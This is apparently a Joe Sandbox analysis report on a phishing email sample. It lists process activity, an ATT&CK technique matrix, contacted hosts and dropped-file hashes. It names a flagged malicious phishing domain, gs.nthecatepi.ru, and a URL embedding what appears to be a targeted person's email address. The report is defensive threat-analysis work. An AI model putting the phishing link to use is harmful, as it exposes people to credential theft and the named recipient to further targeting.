                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
                Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation21
                Browser Extensions
                1
                Process Injection
                11
                Masquerading
                OS Credential Dumping1
                Process Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Modify Registry
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop ProtocolData from Removable Media1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Extra Window Memory Injection
                1
                Process Injection
                Security Account Manager14
                System Information Discovery
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                File Deletion
                LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Extra Window Memory Injection
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                chrome.cloudflare-dns.com
                162.159.61.3
                truefalse
                  high
                  e8652.dscx.akamaiedge.net
                  23.209.213.129
                  truefalse
                    high
                    code.jquery.com
                    151.101.130.137
                    truefalse
                      high
                      developers.cloudflare.com
                      104.16.5.189
                      truefalse
                        high
                        cdnjs.cloudflare.com
                        104.17.24.14
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            www.google.com
                            142.250.184.196
                            truefalse
                              high
                              s-0005.dual-s-dc-msedge.net
                              52.123.130.14
                              truefalse
                                high
                                gs.nthecatepi.ru
                                172.67.151.76
                                truetrue
                                  unknown
                                  x1.i.lencr.org
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://gs.nthecatepi.ru/btb1KhWg/$terry.tuttle@yodel.co.ukfalse
                                      unknown
                                      https://chrome.cloudflare-dns.com/dns-queryfalse
                                        high
                                        https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                          high
                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                            high
                                            https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                              high
                                              https://developers.cloudflare.com/favicon.pngfalse
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                                  high
                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs
                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  142.250.185.99
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  172.217.18.14
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  216.58.206.78
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  2.19.104.203
                                                  unknownEuropean Union
                                                  16625AKAMAI-ASUSfalse
                                                  104.16.5.189
                                                  developers.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  23.209.213.129
                                                  e8652.dscx.akamaiedge.netUnited States
                                                  23693TELKOMSEL-ASN-IDPTTelekomunikasiSelularIDfalse
                                                  151.101.130.137
                                                  code.jquery.comUnited States
                                                  54113FASTLYUSfalse
                                                  162.159.61.3
                                                  chrome.cloudflare-dns.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  199.232.210.172
                                                  unknownUnited States
                                                  54113FASTLYUSfalse
                                                  104.16.2.189
                                                  unknownUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  142.250.186.99
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  3.219.243.226
                                                  unknownUnited States
                                                  14618AMAZON-AESUSfalse
                                                  142.250.184.195
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  172.67.151.76
                                                  gs.nthecatepi.ruUnited States
                                                  13335CLOUDFLARENETUStrue
                                                  104.17.24.14
                                                  cdnjs.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  142.250.184.196
                                                  www.google.comUnited States
                                                  15169GOOGLEUSfalse
                                                  142.250.110.84
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  1.1.1.1
                                                  unknownAustralia
                                                  13335CLOUDFLARENETUSfalse
                                                  52.123.130.14
                                                  s-0005.dual-s-dc-msedge.netUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.18.95.41
                                                  challenges.cloudflare.comUnited States
                                                  13335CLOUDFLARENETUSfalse
                                                  2.19.11.103
                                                  unknownEuropean Union
                                                  719ELISA-ASHelsinkiFinlandEUfalse
                                                  142.250.185.174
                                                  unknownUnited States
                                                  15169GOOGLEUSfalse
                                                  52.109.76.243
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  52.109.76.144
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  20.44.10.123
                                                  unknownUnited States
                                                  8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                  104.77.220.172
                                                  unknownUnited States
                                                  16625AKAMAI-ASUSfalse
                                                  IP
                                                  192.168.2.16
                                                  Joe Sandbox version:42.0.0 Malachite
                                                  Analysis ID:1640423
                                                  Start date and time:2025-03-17 10:12:30 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:22
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • EGA enabled
                                                  Analysis Mode:stream
                                                  Analysis stop reason:Timeout
                                                  Sample name:f64da42c-e9a8-a0ac-437d-d14377da4643.eml
                                                  Detection:MAL
                                                  Classification:mal92.phis.evad.winEML@39/25@18/199
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .eml
                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 52.109.76.243, 2.19.11.103, 2.19.11.102, 52.123.130.14
                                                  • Excluded domains from analysis (whitelisted): ecs.office.com, omex.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, eur.roaming1.live.com.akadns.net, neu-azsc-000.roaming.officeapps.live.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, ecs.office.trafficmanager.net, c.pki.goog, omex.cdn.office.net.akamaized.net, a1864.dscd.akamai.net
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: gs.nthecatepi.ru
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:modified
                                                  Size (bytes):403
                                                  Entropy (8bit):4.953858338552356
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):0
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:4C313FE514B5F4E7E89329630909F8DC
                                                  SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                  SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                  SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):403
                                                  Entropy (8bit):4.968043403316245
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A7AD459E4043AFB1C315A31E5D7017DB
                                                  SHA1:D2330D9FB6AB132E8FF16E8CD6CC7012CED45C9F
                                                  SHA-256:80C8117642CBA5C88A033EF97EF60E3954ACE07123FC1FCA4A1F45DFBF04206F
                                                  SHA-512:79F6650EF1872DE2A9BB5C5474220CD5871D59764C1438C8E80796338C9EB6F6239908D10F2EF8BC8A99656211F506FE5B6F783373332439830BD1A8BF9D7826
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13386762812166437","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":122736},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:PC bitmap, Windows 3.x format, 164 x -116 x 32, cbSize 76150, bits offset 54
                                                  Category:dropped
                                                  Size (bytes):76150
                                                  Entropy (8bit):2.0259927220658605
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:554E4EA9AED1918B5B5CECFC207B82C6
                                                  SHA1:A843759104D1EB1E6FE0F3E6A79E3313082B39B3
                                                  SHA-256:A8E0FFDEC3948CD2EB6061CC577534D3AC246EC31D5D305BD24785DECC14033E
                                                  SHA-512:7EE3D9729E12DF31230B0CBC74853A29BED73D820452B8BA6B3A3557B1C6455EC6E626CC6D27722176C7D462C6B33D284922A7DCCBECF8A9A2890F1AF4F10BCF
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:BMv)......6...(............. ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                  Category:dropped
                                                  Size (bytes):57344
                                                  Entropy (8bit):3.291927920232006
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                                                  SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                                                  SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                                                  SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                  File Type:SQLite Rollback Journal
                                                  Category:dropped
                                                  Size (bytes):16928
                                                  Entropy (8bit):1.2137268256207159
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:439D36C16BADD639D044AF8933825D16
                                                  SHA1:34DE5EEA4A6F6D947691D1868453EE5A671D0BFC
                                                  SHA-256:AF5ACC57F95C9449430048B144F3581DA9CAAFAC83C5CE3B937266A465BB9DA8
                                                  SHA-512:D26A5E5D177CC5F101748670BCB9E09C71B7CB0FB68A58662C1A8057BF7EF5D7D6B857EFEB73327DD360413BA9903B22397AD332D78447D8C4C12B70C6797DD0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.... .c.......G5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                  File Type:Certificate, Version=3
                                                  Category:dropped
                                                  Size (bytes):1391
                                                  Entropy (8bit):7.705940075877404
                                                  Encrypted:false
                                                  SSDEEP:
                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                  Malicious:false
                                                  Reputation:unknown
